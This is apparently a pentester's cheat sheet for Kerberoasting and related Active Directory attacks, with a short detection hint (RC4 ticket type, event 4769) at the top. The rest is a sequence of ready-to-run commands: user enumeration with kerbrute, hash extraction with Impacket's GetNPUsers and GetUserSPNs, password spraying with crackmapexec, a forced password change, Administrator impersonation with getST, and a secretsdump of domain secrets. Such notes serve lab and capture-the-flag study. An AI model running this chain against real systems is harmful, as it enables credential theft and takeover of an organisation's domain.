1.5 KiB
1.5 KiB
Kerberoast
An indicator for kerberoast are downgraded RC4 encryption instead of AES.
That means Ticket_Encryption_Type=0x17 (RC4) instead of 0x12 (AES-256).
The event code for TGS, which is needed for kerberoasting is 4769.
Usage
List users
kerbrute userenum -d $DOMAIN --dc $TARGET_IP $USER_LIST
kerbrute userenmum --dc $TARGET_IP --domain $DOMAIN $USER_LIST --downgrade
Get Users
- Impacket's
GetNPUsers.pyto get Hashes of userlist
GetNPUsers.py -no-pass <DomainName>/ -usersfile users.txt -format john -outputfile hashes
Find SPNs
GetUserSPNs.py -request <DOMAIN>/<USER>:<PASSWORD> -dc-ip $TARGET_IP
or
pyverview get-netuser -u <USER> -p <PASSWORD> -t <SUBDOMAIN> -d <DOMAIN>
Further Intel
findDelegation.py -debug <DOMAIN>/<USER>:<PASSWORD> -dc-ip $TARGET_IP
Check Found Users
Use crackmapexec to check access to further user accounts with the password of the user found with GetNPUsers.py
crackmapexec smb $TARGET_IP -u users.txt -p pass.txt
Watch out for STATUS_PASSWORD_MUST_CHANGE
Change password with
smbpasswd.py <user>@$TARGET_IP -newpass password123
Impersonate
getST.py -spn <USER>/<SUBDOMAIN> -impersonate Administrator '<DOMAIN>/<USER>:<PASSWORD>' -dc-ip $TARGET_IP
- Serviceticket is safe as
Administrator.ccache export KRB5CCNAME=Administrator.ccache
After that dump secrets:
secretsdump.py -k -no-pass <DOMAIN>